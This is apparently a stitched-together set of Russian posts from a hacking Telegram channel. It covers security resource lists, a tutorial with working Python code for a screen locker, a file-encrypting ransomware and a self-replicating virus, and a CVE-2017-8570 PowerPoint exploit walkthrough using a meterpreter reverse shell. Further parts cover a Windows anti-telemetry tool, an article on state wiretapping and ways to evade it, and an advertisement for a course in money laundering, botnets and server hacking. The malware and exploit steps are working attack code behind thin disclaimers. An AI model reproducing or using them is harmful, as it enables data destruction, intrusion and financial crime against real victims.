Огромная подборка полезных вещей, инструментов, книг и прочих источников для хакеров, тестировщиков на проникновение и исследователей в области информационной безопасности.

Android Security

Коллекция источников о безопасности Android.

AppSec

Ресурсы для изучения безопасности приложений.

Bug Bounty

Список программ и записей по Bug Bounty.

Cheatsheets

Тестирование на проникновение/ Шпаргалки по безопасности.

CTF

Список фреймворков по CTF, библиотеки, разные источники, ПО.

Cyber Skills

Список хакерских сред, где можно отточить свои навыки легально и безопасно.

DevSecOps

Список отличных инструментов DevSecOps, поддерживаемые сообществом.

Exploit Development

Ресурсы для изучения Exploit Development.

Fuzzing

Список ресурсов для обучения фаззингу и начальным этапам Exploit Development вроде анализа основной причины (root cause analysis).

Hacking

Список потрясающих туториалов, инструментов и прочих ресурсов по взлому.

Honeypots

Список ресурсов по honeypot.

Incident Response

Список инструментов по реагированию на инциденты.

Industrial Control System Security

Список ресурсов, связанных с безопасностью автоматизированной системы контроля (ICS).

InfoSec

Список удивительных информационных курсов и учебных ресурсов по информационной безопасности.

IoT Hacks

Коллекция хаков в сфере IoT.

Malware Analysis

Список удивительных инструментов и ресурсов анализа вредоносных программ.

OSINT

Список великолепных инструментов и ресурсов Open Source Intelligence (OSINT).

OSX and iOS Security

Инструменты по безопасности для OSX и iOS.

Pcaptools

Сборник инструментов, разработанных исследователями в области информатики для обработки сетей.

Pentest

Список потрясающих ресурсов тестирования на проникновение, различные инструменты и выдающиеся вещи.

PHP Security

Библиотеки для создания псевдослучайных чисел, шифрования данных и сканирования уязвимостей.

Reversing

Список потрясающих ресурсов по обратной разработке.

Sec Talks

Список полезных разговоров по безопасности.

SecLists

Сборник нескольких типов списков, используемых во время оценки безопасности.

Security

Коллекция программного обеспечения, библиотек, документов, книг, ресурсов и других интересных материалов о безопасности.

Social Engineering

Список удивительных ресурсов по социальной инженерии.

Static Analysis

Список инструментов статического анализа, линтеров и контролеров качества кода для различных языков программирования.

Threat Intelligence

Список ресурсов по Threat Intelligence.

Vehicle Security

Список ресурсов для изучения безопасности и взлома автомобиля.

Vulnerability Research

Список ресурсов по исследованию уязвимостей.

Web Hacking

Список на тему безопасности веб-приложений.

Windows Exploitation

Список потрясающих ресурсов по эксплуатации Windows.

WiFi Arsenal

Набор разнообразных инструментов для взлома 802.11.

API Security Checklist

Контрольный список наиболее важных контрмер безопасности при разработке, тестировании и выпуске вашего API.

APT Notes

Различные публичные документы, официальные документы и статьи о целевых кибератаках(APT).

Bug Bounty Reference

Список bug bounty, который отсортирован на категории, в зависимости от характеристики багов.

Cryptography

Инструменты и источники материалов по криптографии.

CTF Tool

Фреймворки, библиотеки, прочие источники и ПО для Захвата Флага.

CVE PoC

Список CVE Proof of Concepts (PoCs).

Forensics

Отличные инструменты и источники по экспертному анализу.

Free Programming Books

Бесплатные книги для разработчиков.

Gray Hacker Resources

Полезности для Захвата флага, военных игр и пентестинга.

Infosec Getting Started

Сборник источников, документации, ссылок и прочего для того чтобы помочь людям изучить информационную безопасность.

Infosec Reference

Потрясающий справочник по информационной безопасности.

IOC

Коллекция источников с индикаторами компрометации.

Linux Kernel Exploitation

Куча ссылок по фаззингу и эксплуатации ядра Linux.

Lockpicking

Ресурсы, связанные с безопасностью и взломом замков, сейфов и ключей.

Machine Learning for Cyber Security

Список инструментов и ресурсов, связанных с использованием машинного обучения для кибербезопасности.

Malware Scripts

Полезные скрипты, связанные с вредоносным ПО.

Payloads

Сборник по многофункциональной начинке веб-атак.

PayloadsAllTheThings

Список полезной информации об обходе безопасности веб-приложений и пентестингу/захвату флага.

Pentest Cheatsheets

Полезные трюки для пентестинга.

Pentest Wiki

Бесплатная онлайн библиотека для пентестеров и исследователей.

Probable Wordlists

Словарные списки, отсортированные по вероятности, которые изначально были созданы для создания и тестирования паролей.

Resource List

Коллекция полезных GitHub проектов.

Reverse Engineering

Статьи, книги по обратной разработке.

RFSec-ToolKit

Набор инструментов по протоколу передачи радио частоты.

Security Cheatsheets

Шпаргалки для разных инструментов и тем по информационной безопасности.

Security List

Великолепный список по безопасности ради удовольствия и прибыли.

Shell

Список фреймворков, инструментов, гайдов, полезных вещей для того, чтобы использовать консоль по полной.

ThreatHunter-Playbook

Книга для охотника за угрозами, которая поможет разработать техники и гипотезы для отлова.

Источник

Все наши проекты можно глянуть здесь-> https://t.me/h4ckers_zone

Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.

Содержание статьи:

• Настройка среды
• Локер
• Шифровальщик
• Вирус
• Делаем исполняемый файл
• Заключение

Почему кому-то может прийти в голову писать малварь на Python? Мы сделаем это, чтобы изучить общие принципы вредоносостроения, а заодно ты попрактикуешься в использовании этого языка и сможешь применять полученные знания в других целях. К тому же малварь на Python таки попадается в дикой природе, и далеко не все антивирусы обращают на нее внимание.

Чаще всего Python применяют для создания бэкдоров в софте, чтобы загружать и исполнять любой код на зараженной машине. Так, в 2017 году сотрудники компании Dr.Web обнаружили Python.BackDoor.33, а 8 мая 2019 года был замечен Mac.BackDoor.Siggen.20. Другой троян — RAT Python крал пользовательские данные с зараженных устройств и использовал Telegram в качестве канала передачи данных.

Мы же создадим три демонстрационные программы: локер, который будет блокировать доступ к компьютеру, пока пользователь не введет правильный пароль, шифровальщик, который будет обходить директории и шифровать все лежащие в них файлы, а также вирус, который будет распространять свой код, заражая другие программы на Python.

INFO

Несмотря на то что наши творения не претендуют на сколько-нибудь высокий технический уровень, они в определенных условиях могут быть опасными. Поэтому предупреждаю, что за нарушение работы чужих компьютеров и уничтожение информации может последовать строгое наказание. Давай сразу договоримся: запускать все, что мы здесь описываем, ты будешь только на своей машине, да и то осторожно — чтобы случайно не зашифровать себе весь диск.

Настройка среды

Итак, первым делом нам, конечно, понадобится сам Python, причем третьей версии.

Дополнительно установим несколько модулей, которые будем использовать:

pip install pyAesCrypt
pip install pyautogui
pip install tkinter

На этом с подготовительным этапом покончено, можно приступать к написанию кода.

Локер

Идея — создаем окно на полный экран и не даем пользователю закрыть его.

Импорт библиотек:

import pyautogui
from tkinter import Tk, Entry, Label
from pyautogu соi import click, moveTo
from time import sleep

Теперь возьмемся за основную часть программы.

# Создаем окно
root = Tk()
# Вырубаем защиту левого верхнего угла экрана
pyautogui.FAILSAFE = False
# Получаем ширину и высоту окна
width = root.winfo_screenwidth()
height = root.winfo_screenheight()
# Задаем заголовок окна
root.title('From "Xakep" with love')
# Открываем окно на весь экран
root.attributes("-fullscreen", True)
# Создаем поле для ввода, задаем его размеры и расположение
entry = Entry(root, font=1)
entry.place(width=150, height=50, x=width/2-75, y=height/2-25)
# Создаем текстовые подписи и задаем их расположение
label0 = Label(root, text="╚(•⌂•)╝ Locker by Xakep (╯°□°）╯︵ ┻━┻", font=1)
label0.grid(row=0, column=0)
label1 = Label(root, text="Пиши пароль и жми Ctrl + C", font='Arial 20')
label1.place(x=width/2-75-130, y=height/2-25-100)
# Включаем постоянное обновление окна и делаем паузу
root.update()
sleep(0.2)
# Кликаем в центр окна
click(width/2, height/2)
# обнуляем ключ
k = False
# Теперь непрерывно проверяем, не введен ли верный ключ
# Если введен, вызываем функцию хулиганства
while not k:
    on_closing()

Здесь pyautogui.FAILSAFE = False — защита, которая активируется при перемещении курсора в верхний левый угол экрана. При ее срабатывании программа закрывается. Нам это не надо, поэтому вырубаем эту функцию.

Чтобы наш локер работал на любом мониторе с любым разрешением, считываем ширину и высоту экрана и по простой формуле вычисляем, куда будет попадать курсор, делаться клик и так далее. В нашем случае курсор попадает в центр экрана, то есть ширину и высоту мы делим на два. Паузу (sleep) добавим для того, чтобы пользователь мог ввести код для отмены.

Сейчас мы не блокировали ввод текста, но можно это сделать, и тогда пользователь никак от нас не избавится. Для этого напишем еще немного кода. Не советую делать это сразу. Сначала давай настроим программу, чтобы она выключалась при вводе пароля. Но код для блокирования клавиатуры и мыши выглядит вот так:

import pythoncom, pyHook

hm = pyHook.HookManager()
hm.MouseAll = uMad
hm.KeyAll = uMad
hm.HookMouse()
hm.HookKeyboard()
pythoncom.PumpMessages()

Создадим функцию для ввода ключа:

def callback(event):
    global k, entry
    if entry.get() == "xakep":
        k = True

Тут всё просто. Если ключ не тот, который мы задали, программа продолжает работать. Если пароли совпали — тормозим.

Последняя функция, которая нужна для работы окна-вредителя:

def on_closing():
    # Кликаем в центр экрана
    click(width/2, height/2)
    # Перемещаем курсор мыши в центр экрана
    moveTo(width/2, height/2)
    # Включаем полноэкранный режим
    root.attributes("-fullscreen", True)
    # При попытке закрыть окно с помощью диспетчера задач вызываем on_closing
    root.protocol("WM_DELETE_WINDOW", on_closing)
    # Включаем постоянное обновление окна
    root.update()
    # Добавляем сочетание клавиш, которые будут закрывать программу
    root.bind('<Control-KeyPress-c>', callback)

На этом наш импровизированный локер готов.

Шифровальщик

Этот вирус мы напишем при помощи только одной сторонней библиотеки — pyAesCrypt. Идея — шифруем все файлы в указанной директории и всех директориях ниже. Это важное ограничение, которое позволяет не сломать операционку. Для работы создадим два файла — шифратор и дешифратор. После работы исполняемые файлы будут самоудаляться.

Сначала запрашиваем путь к атакуемому каталогу и пароль для шифрования и дешифровки:

direct = input("Напиши атакуемую директорию: ")
password = input("Введи пароль: ")

Дальше мы будем генерировать скрипты для шифрования и дешифровки. Выглядит это примерно так:

with open("Crypt.py", "w") as crypt:
    crypt.write('''
    текст программы
    ''')

Переходим к файлам, которые мы будем использовать в качестве шаблонов. Начнем с шифратора. Нам потребуются две стандартные библиотеки:

import os
import sys

Пишем функцию шифрования (все по мануалу pyAesCrypt):

def crypt(file):
    import pyAesCrypt
    print('-' * 80)
    # Задаем пароль и размер буфера
    password = "'''+str(password)+'''"
    buffer_size = 512*1024
    # Вызываем функцию шифрования
    pyAesCrypt.encryptFile(str(file), str(file) + ".crp", password, buffer_size)
    print("[Encrypt] '"+str(file)+".crp'")
    # Удаляем исходный файл
    os.remove(file)

Вместо str(password) скрипт-генератор вставит пароль.

Важные нюансы. Шифровать и дешифровать мы будем при помощи буфера, таким образом мы избавимся от ограничения на размер файла (по крайней мере, значительно уменьшим это ограничение). Вызов os.remove(file) нужен для удаления исходного файла, так как мы копируем файл и шифруем копию. Можно настроить копирование файла вместо удаления.

Теперь функция, которая обходит папки. Тут тоже ничего сложного.

def walk(dir):
    # Перебор всех подпапок в указанной папке
    for name in os.listdir(dir):
        path = os.path.join(dir, name)
        # Если это файл, шифруем его
        if os.path.isfile(path):
            crypt(path)
        # Если это папка, рекурсивно повторяем
        else:
            walk(path)

В конце добавим еще две строки. Одна для запуска обхода, вторая — для самоуничтожения программы.

walk("'''+str(direct)+'''")
os.remove(str(sys.argv[0]))

Здесь снова будет подставляться нужный путь.

Вот весь исходник целиком.

import os
import sys

def crypt(file):
    import pyAesCrypt
    print('-' * 80)
    password = "'"+str(password)+"'"
    buffer_size = 512*1024
    pyAesCrypt.encryptFile(str(file), str(file) + ".crp", password, buffer_size)
    print("[Encrypt] '"+str(file)+".crp'")
    os.remove(file)

def walk(dir):
    for name in os.listdir(dir):
        path = os.path.join(dir, name)
        if os.path.isfile(path):
            crypt(path)
        else:
            walk(path)

walk("'''+str(direct)+'''")
print('-' * 80)
os.remove(str(sys.argv[0]))

Теперь «зеркальный» файл. Если в шифровальщике мы писали encrypt, то в дешифраторе пишем decrypt. Повторять разбор тех же строк нет смысла, поэтому сразу финальный вариант.

import os
import sys

# Функция расшифровки
def decrypt(file):
    import pyAesCrypt
    print('-' * 80)
    password = "'''+str(password)+'''"
    buffer_size = 512 * 1024
    pyAesCrypt.decryptFile(str(file), str(os.path.splitext(file)[0]), password, buffer_size)
    print("[Decrypt] '" + str(os.path.splitext(file)[0]) + "'")
    os.remove(file)

# Обход каталогов
def walk(dir):
    for name in os.listdir(dir):
        path = os.path.join(dir, name)
        if os.path.isfile(path):
            try:
                decrypt(path)
            except Error:
                pass
        else:
            walk(path)

walk("'''+str(direct)+'''")
print('-' * 80)
os.remove(str(sys.argv[0]))

Итого 29 строк, из которых на дешифровку ушло три. На случай, если какой-то из файлов вдруг окажется поврежденным и возникнет ошибка, пользуемся отловом исключений (try...except). То есть, если не получиться расшифровать файл, мы его просто пропускаем.

Вирус

Здесь идея в том, чтобы создать программу, которая будет заражать другие программы с указанным расширением. В отличие от настоящих вирусов, которые заражают любой исполняемый файл, наш будет поражать только другие программы на Python.

На этот раз нам не потребуются никакие сторонние библиотеки, нужны только модули sys и os. Подключаем их.

import sys
import os

Создадим три функции: сообщение, парсер, заражение.

Функция, которая сообщает об атаке:

def code(void):
    print("Infected")

Сразу вызовем ее, чтобы понять, что программа отработала:

code(None)

Обход директорий похож на тот, что мы делали в шифровальщике.

def walk(dir):
    for name in os.listdir(dir):
        path = os.path.join(dir, name)
        # Если нашли файл, проверяем его расширение
        if os.path.isfile(path):
            # Если расширение — py, вызываем virus
            if (os.path.splitext(path)[1] == ".py"):
                virus(path)
            else:
                pass
        else:
            # Если это каталог, заходим в него
            walk(path)        

INFO

В теории мы могли бы таким же образом отравлять исходники и на других языках, добавив код на этих языках в файлы с соответствующими расширениями. А в Unix-образных системах скрипты на Bash, Ruby, Perl и подобном можно просто подменить скриптами на Python, исправив путь к интерпретатору в первой строке.

Вирус будет заражать файлы «вниз» от того каталога, где он находится (путь мы получаем, вызвав os.getcwd()).

В начале и в конце файла пишем вот такие комментарии:

# START #
# STOP #

Чуть позже объясню зачем.

Дальше функция, которая отвечает за саморепликацию.

def virus(python):
    begin = "# START #\n"
    end = "# STOP #\n"
    # Читаем атакуемый файл, назовем его copy
    with open(sys.argv[0], "r") as copy:
        # Создаем флаг
        k = 0
        # Создаем переменную для кода вируса и добавляем пустую строку
        virus_code = "\n"
        # Построчно проходим заражаемый файл
        for line in copy:
            # Если находим маркер начала, поднимаем флаг
            if line == begin:
                k = 1
                # Добавляем маркер в зараженный код
                virus_code += begin
            # Если мы прошли начало, но не дошли до конца, копируем строку
            elif k == 1 and line != end:
                virus_code += line
            # Если дошли до конца, добавляем финальный маркер и выходим из цикла
            elif line == end:
                virus_code += end
                break
            else:
                pass
    # Снова читаем заражаемый файл
    with open(python, "r") as file:
        # Создаем переменную для исходного кода
        original_code = ""
        # Построчно копируем заражаемый код
        for line in file:
            original_code += line
            # Если находим маркер начала вируса, останавливаемся и поднимаем флаг vir
            if line == begin:
                vir = True
                break
            # Если маркера нет, опускаем флаг vir
            else:
                vir = False
    # Если флаг vir опущен, пишем в файл вирус и исходный код
    if not vir:
        with open(python, "w") as paste:
            paste.write(virus_code + "\n\n" + original_code)
    else:
        pass

Теперь, думаю, стало понятнее, зачем нужны метки «старт» и «стоп». Они обозначают начало и конец кода вируса. Сперва мы читаем файл и построчно просматриваем его. Когда мы наткнулись на стартовую метку, поднимаем флаг. Пустую строку добавляем, чтобы вирус в исходном коде начинался с новой строки. Читаем файл второй раз и записываем построчно исходный код. Последний шаг — пишем вирус, два отступа и оригинальный код. Можно поиздеваться и записать его как-нибудь по-особому — например, видоизменить все выводимые строки.

Делаем исполняемый файл

Как запустить вирус, написанный на скриптовом языке, на машине жертвы? Есть два пути: либо как-то убедиться, что там установлен интерпретатор, либо запаковать наше творение вместе со всем необходимым в единый исполняемый файл. Этой цели служит утилита PyInstaller. Вот как ей пользоваться.

Устанавливаем

pip install PyInstaller

И вводим команду

PyInstaller "имя_файла.py" --onefile --noconsole

Немного ждем, и у нас в папке с программой появляется куча файлов. Можешь смело избавляться от всего, кроме экзешников, они будет лежать в папке dist.

Говорят, что с тех пор, как начали появляться вредоносные программы на Python, антивирусы стали крайне нервно реагировать на PyInstaller, причем даже если он прилагается к совершенно безопасной программе.

Я решил проверить, что VirusTotal скажет о моих творениях. Вот отчеты:

• файл Crypt.exe не понравился 12 антивирусам из 72;
• файл Locker.exe — 10 антивирусам из 72;
• файл Virus.exe — 23 антивирусам из 72.

Худший результат показал Virus.exe — то ли некоторые антивирусы обратили внимание на саморепликацию, то ли просто название файла не понравилось. Но как видишь, содержимое любого из этих файлов насторожило далеко не все антивирусы.

Заключение

Итак, мы написали три вредоносные программы, использовав скриптовый язык, и упаковали их при помощи PyInstaller.

Безусловно, наш вирус — не самый страшный на свете, а локер и шифровальщик еще нужно как-то доставлять до машины жертвы. При этом ни одна из наших программ не общается с C&C-сервером и я совсем не обфусцировал код, так что здесь остается еще огромный простор для творчества.

Тем не менее уровень детекта антивирусами оказался на удивление низким. Получается, что даже самая простая самописная малварь может стать угрозой. Так что антивирусы антивирусами, но скачивать из интернета случайные программы и запускать их не думая всегда будет небезопасно.

Все наши проекты можно глянуть здесь-> https://t.me/h4ckers_zone

Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.

Что нам понадобится:

1. Kali linux
2. Metasploit
3. Знание базовых команд линукс

Начинаем:

1) Скачиваем эксплойт с GitHub->https://github.com/tezukanice/Office8570

2) Переходим в папку эксплойта:

cd Office8570

3) Создаём папку "template" (Понадобится для успешной генерации ppsx файла)

mkdir template

4)Переносим файл template.ppsx(он находится в папке, которую мы скачали)

cp template.ppsx template/

5)Создаём сам сaм .ppsx файл( имя презентации меняется здесь )

python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http://ВашАйпи/logo.doc

Файл презентации мы сделали, нo в него нужно вшить вирус(полезную нагрузку)

7)Создадим Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /tmp/shell.exe

8) Запускаем слушатель, который сообщит и получит управление после открытия файла жертвой.

msfconsole -x «use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ВашАйпи; set LPORT 4444; run»

9)Запускаем сервер

python cve-2017-8570_toolkit.py -M exp -e http://ВашАйпи/shell.exe -l /tmp/shell.exe

Принцип работы

После открытия презентации жертвой вирус начинает незаметно скачиваться, а затем компьютер автоматически запускает его. После этого в консоли откроется сессия и вы сможете управлять компьютером жертвы.

BTC-Чек BTC-Чек BTC-Чек

https://t.me/h4ckers_zone

В современном цифровом мире достаточно много вопросов «упираются» в проблему отслеживания персональных данных, а также тёмную схему шпионажа за пользовательской деятельностью. В данной статье мы поговорим о том, как можно полноценно защититься от подобных проблем в операционной системе Windows, а также рассмотрим особенности полезного инструмента Windows Spy Blocker.

Windows Spy Blocker

Windows Spy Blocker предназначен для блокировки шпионажа и отслеживания. Приложение выполняется с использованием языка программирования Go. Эта программа фиксирует и анализирует сетевой трафик на основе набора определённых инструментов. Она доступна для Windows 7 SP1, Windows 8, Windows 10.

Ссылка-> https://github.com/crazy-max/WindowsSpyBlocker/releases/tag/4.16.0

Он поставляется в виде легкого исполняемого файла. Хорошо, что исполняемый файл может быть загружен (опция для всех, кто ненавидит печатать команды загрузки в командной строке). Текущий выпуск составляет всего лишь 5,5 Мб. Утилита захватывает и анализирует сетевой трафик на основе набора инструментов, реализованных в ней.

Как работает Windows Spy Blocker

В принципе понятно, разработчик написал данный исполняемый файл специально для того, чтобы заблокировать следящие программы, которые выявляются на основе анализа сетевого трафика. Он не русифицирован, да это и не нужно, так как полноценного интерфейса у него нет, и программа, по сути, представляет собой набор определенных правил.

Консоль появляется сразу после разрешения на запуск. Первое, что нужно сделать, это включить ваше интернет-соединение, если оно ещё не включено. Если так случилось, что интернет-соединение отсутствует, появится ошибка. Команды выложены на консоли с описанием того, что делает каждая, поэтому Вам будет легко разобраться.

В основной части представлены блоки «Telemetry» и «Dev», которые можно запустить, введя соответственно 1 и 2. Эти команды вызывают дополнительные подкоманды.

Если изобразить данную информацию иерархически, то это будет выглядеть примерно так:

Полученные результаты изменяются в соответствии с введенной командой. Итак, чтобы захватить и проанализировать сетевой трафик для телеметрии, разработчик использовал виртуальные машины QEMU на платформе Proxmox VE. При этом дампы памяти очищаются ежедневно, происходит сравнение текущих правил добавления или удаления некоторых хостов или правил брандмауэра. Разработчик указывает, что для захвата трафика он использует следующие инструменты: Qemu -net dump, Sysmon, Wireshark, Proxifier. Все события, которые происходят, сохраняются в папке журналов.

Папка данных содержит правила блокировки, основанные на доменах или IP-адресах, обнаруженных во время процесса захвата: блокирование телеметрии, обновления ОС, блокирование сторонних приложений.

Сразу советую создать под Windows Spy Blocker специальную папку, куда первоначально нужно сохранить саму программу, и там же будут сохраняться все конфигурации, журналы и папки, которые утилита в процессе работы будет создавать. Разработчик программы рекомендует скопировать файл hosts, созданный программой, и находящийся в папке Data, и вставить в hosts вашей системы.

Утилита будет востребована у тех пользователей, которые хотят следить за своим сетевым трафиком.Таким образом, теперь Вы сможете полноценно использовать прекрасный инструмент Windows Spy Blocker с отличным мотивом, помогающим избежать отслеживания и ускорения. Его функционал очень прост в использовании, поэтому в процессе своей добросовестной работы он Вас вряд ли разочарует.

https://t.me/h4ckers_zone

«Не по телефону». «Сейчас перезвоню с другого номера». «Давай выйдем на улицу, прогуляемся, тут лучше не говорить».

Такие фразы прочно вошли в жизнь российского истеблишмента, а ведь еще несколько лет назад жалующихся на прослушку телефонов и кабинетов принимали за полусумасшедших, вроде тех, кто носит шапочки из фольги и верит в зомбирующие лучи КГБ.
Сегодня все знают: слушают всех, слушают без оглядки на закон и материалы этих прослушек чаще используют не в суде, а в политических интригах, доносах и провокациях.

На языке правоохранительных органов прослушка телефонов и контроль интернет-трафика называются аббревиатурой «СОРМ» - «Система технических средств для обеспечения функций оперативно-розыскных мероприятий».

СОРМ-1 – это комплекс мероприятий, направленных на прослушку мобильной связи
СОРМ-2 – комплекс мероприятий, направленных на мобильного интернет-трафика.

Сегодня такие методы расследования выходят на первый план, затмевая традиционные криминалистические подходы. Соответственно, подразделения, отвечающие за СОРМ, становятся все более влиятельными в составе органов внутренних дел.

По закону, прослушка телефонов и контроль интернет-трафика возможны только по решению суда.

Правда, закон позволяет следователям «включать запись» и без такового, если дело срочное и прослушка необходима для предотвращения готовящегося преступления. Примерно по такому же принципу следователям «в виде исключения» разрешают проводить обыски, получая санкцию суда уже постфактум. Как и в случае с обысками, часто правоохранители пользуются этой нормой, чтобы получать бесконтрольный доступ к чужим тайнам.

Существуют также способы легализовать незаконную прослушку.

Поместив имя и телефон нужной персоны в длинный перечень подозреваемых по какому-нибудь уголовному делу. Как говорят источники в органах, судьи почти никогда не вникают, каким образом та или иная фамилия связана с уголовным делом, и подписывают разрешения «одним махом». Такие судебные решения носят гриф «секретно», и кто оказался в списках «на прослушку», гражданам не узнать никогда.

Впрочем, специалисты, занимающиеся прослушкой, говорят: сегодня все чаще граждан «ставят на запись» и вовсе без каких-либо решений суда. У каждого оператора связи установлена аппаратура, позволяющая силовикам в любое время получать доступ к разговорам любого клиента (к этому операторов обязывает закон). А в региональном управлении ФСБ есть терминал удаленного доступа, с помощью которого можно в несколько кликов начать слушать любого пользователя мобильной связи. По закону, право вести прослушку имеют несколько специальных служб. Кроме самой ФСБ, это МВД, ФСКН, ГУФСИН, таможня, ФСО, СВР. Но контроль за самой аппаратурой, обеспечивающей работу СОРМ-1 и СОРМ-2, находится именно у ФСБ. Как объясняют специалисты, чтобы поставить тот или иной номер на прослушку, сотрудникам из полицейского бюро специальных технических мероприятий не обязательно бежать в ФСБ и просить нажать кнопочку: в МВД и других органах, ведущих оперативно-розыскную деятельность, есть собственные терминалы доступа, но они подключены «через ФСБ», то есть главный ключ все равно расположен у чекистов.

Как уберечься от прослушки?

Почти никак. Во-первых, бесполезно менять SIM-карты: на прослушку ставят не номер мобильного, а уникальный номер телефонного аппарата (IMEI). Какая бы симка не была установлена в телефоне, он все равно будет «в прямом эфире». Многие представители истеблишмента и бизнесмены носят с собой несколько телефонов, считая, что один «обычный» слушается, а другие – «левые» - нет. Это наивно Если человека поставили на прослушку, сотрудники органов постоянно получают информацию о местонахождении его телефона. Для этого в телефоне не обязательно должен быть установлен модуль GPS, местоположение даже самой простой и дешевой трубки определяется по базовым станциям с точностью до одного метра. И если вы таскаете с собой несколько трубок, по данным геолокации видно, что рядом с вашим «основным» номером всегда есть 2-3 других. Их тоже сразу же ставят на прослушку, поэтому ходить с кучей телефонов совершенно бессмысленно.

Впрочем, есть небольшой фокус с двумя трубками, который позволяет относительно надежно сохранить тайну переговоров.
Допустим, есть два аппарата – A и B.
A используется постоянно, и есть основания полагать, что его слушают.
B – для конфиденциальных разговоров, зарегистрирован на другое лицо.
В этом случае A и B никогда не должны быть включены одновременно и рядом. Если нужно сделать звонок по «секретному» телефону B, вы выключаете A, отъезжаете подальше, в зону действия другой базовой станции, потом включаете B, делаете звонок. Потом выключаете B, снова едете к другой базовой станции и уже тогда включаете A.
Другой способ – постоянно хранить «секретный» телефон в каком-нибудь скрытом месте, всякий раз приезжая к нему с выключенным «основным» мобильником.

Особо осторожные жертвы прослушек предпочитают выключать телефон во время важного разговора или прятать его куда подальше.
Возможность записи через телефон в режиме ожидания существует, но такая технология применяется нечасто. В этих случаях используется т.н. микрофонный эффект. Такое можно сделать, только если в непосредственной близости от собеседников работает команда специалистов. Приемник сигнала и средство записи должны находиться где-то недалеко

С анализом интернет-трафика подозрительных граждан (СОРМ-2) у силовиков дела обстоят пока несколько хуже, чем с прослушкой разговоров. Хотя операторы связи точно так же предоставляют спецслужбам любую информацию, сам анализ этих данных довольно сложен. Любой смартфон постоянно скачивает и отправляет огромное количество данных. До последнего времени существовала огромная проблема в том, чтобы вычленить из всей этой массы интересующую информацию, например переписку в Skype. Однако теперь эта задача в целом решена и даже в регионах научились читать интернет-мессенджеры

Может быть, силовикам бы и хотелось «слушать всех», но в реальности под постоянным наблюдением всего 200-300 человек на миллион. Большинство из них – подозреваемые в экстремизме (в первую очередь исламистского толка) и терроризме, члены находящихся в разработке ОПГ, участники непрозрачных финансовых операций крупного масштаба («обналичники» и т.п.). Лишь не более 10% от всей массы «поднадзорных» слушают по политическому заказу.

В последнее время появился еще один проверенный способ стать жертвой прослушки

Регулярно критиковать действующую власть или ходить на демонстрации протеста. Конечно, всех участников уличных акций прослушивать не будут, но самых активных – вполне.

В последнее время все более значимую роль в структуре СОРМ играет анализ информации, собранной в социальных сетях. Спецслужбы имеют доступ ко всей переписке, ведущейся в российских социальных сетях. C Facebook дело обстоит сложнее, но и тут тайна общения не гарантирована. Относительно безопасный способ общения – через западные почтовые сервисы - например, Gmail или мессенджеры - например telegram.

Перлюстрация электронной переписки, мониторинг телефонных переговоров зашли уже так далеко, как и не снилось авторам романов-антиутопий.
Наверное, нередко мощь СОРМов помогает предотвратить подлинные теракты или настоящие преступления, но для общества куда заметнее случаи, когда методы электронной разведки используются для политического преследования и не имеют никакого отношения к законным процедурам.

https://t.me/h4ckers_zone

Рыночная цена: 70 тысяч рублей
Цена в @sshop_robot: 299 рублей

Изучив курс, ты научишься:

Безопасность:

• Настраивать анонимную и безопасную систему
• Обналичивать грязные и серые денежные поступления
• Обходить банковские проверки
• Скрывать подмену fingerprint и IP
• Настраивать безопасность системы виртуализации
• Шифровать трафик и защищаться от перехвата
• Перехватывать трафик в TOR
• Владение нашими персональными софтами
• Обрести знания по векторам атак и мерами их предотвращения
• Создавать изолированную сеть без любых утечек трафика
  и многое другое

Хакинг:

• Искать уязвимости методом фаззиннга
• Вытягивать Базы Данных и монетизировать данные
• Владеть Linux
• Массовый сбор серверов
• Лить шеллы эксплуатируя Remote File Include
• Получать доступы к серверам
• Автоматизировать работу
• Поднимать свой DNS и лить на него трафик
• Поймешь, что данные - самое дорогое в мире и будешь их монетизировать
• Работать по трафику

Вирусология:

• Настраивать и использовать вирусы
• Превращать загрузки в деньги
• Разбираться в вирусах
• Обходить антивирусы
• Создавать и контролировать ботнет
• Управлять машиной после заражения
• Зачищать следы после атаки

Соц. инженерия:

• Находить подходы к людям
• Понимать паттерны поведения
• Входить в доверие
• Манипулировать поведением
• Зарабатывать на хайпах
• Составлять планы атаки
• Избегать основных ошибки

Для кого этот курс:

1. Тебя манит на темную сторону, но ты не знаешь с чего начать
2. Ты хочешь класть крупные котлеты в свой карман используя свой мозг
3. Ты хочешь овладеть самыми прибыльными направлениями
4. Ты не хомячок верящий в светлое будущее работая на дядю
5. Ты хочешь перестать смотреть на цены в меню Мишленовского ресторана
6. Ты понимаешь, что реально большой куш зарабатывается интеллектом
7. Тебя тошнит от слов "кредит" и "ипотека" и поставил цель купить все желаемое за реальный кэш
8. Ты прочитал все эти пункты и готов ебашить

Содержание курса:

Security / Безопасность

• Настройка полностью анонимной и безопасной системы
• Обход слежки провайдером
• Шифрование диска на уровне системы
• Создание криптоконтейнеров и безопасное хранение данных вне системы
• Подмена уникальных параметров системы и браузера для обхода fingerprint
• Шифрование трафика и запутывание его источника
• Ввод и вывод валюты в даркнете
• Отбеливание криптовалюты
• Противодействие утечке реальных данных
• Поддержание сессии для обхода банковских проверок
• Настройка анонимных виртуальных машин
• Защита от проникновения в основную систему
• Перехват трафика в системе и на сервере
• Защита от атак нулевого дня
• Связки для безопасного и анонимного доступа в интернет
• Double VPN и его работа в связке с тором
• Защита от падения VPN и утечек из-за сетевых сбоев
• Работа через удалённую систему windows
• Софт для конфигурации и очистки системы
• Отключение подозрительных функций в windows
• Обход утечек через мета-информацию у файлов
• Защита от DNS leak
• Противодействие вычислению через анализ логов
• Использование левых карт и симок
• Схемы отмывания и обналичивания валюты

Hacking / Хакинг

• Основы Linux
• Основы web
• Поиск уязвимостей методом фаззинга
• Вытягивание БД через эксплуатацию SQL-injection
• Пробиваемся на сервак или эксплуатация Local File Include
• Льем шеллы через эксплуатацию Remote File Include
• Что такое Remote Code Execution и с чем его едят
• Изучение инструментария или "секрет моего успеха - автоматизация"
• "Из грязи в князи" поднимаем привелегии на серваке используя эксплоиты для Privilege Escalation
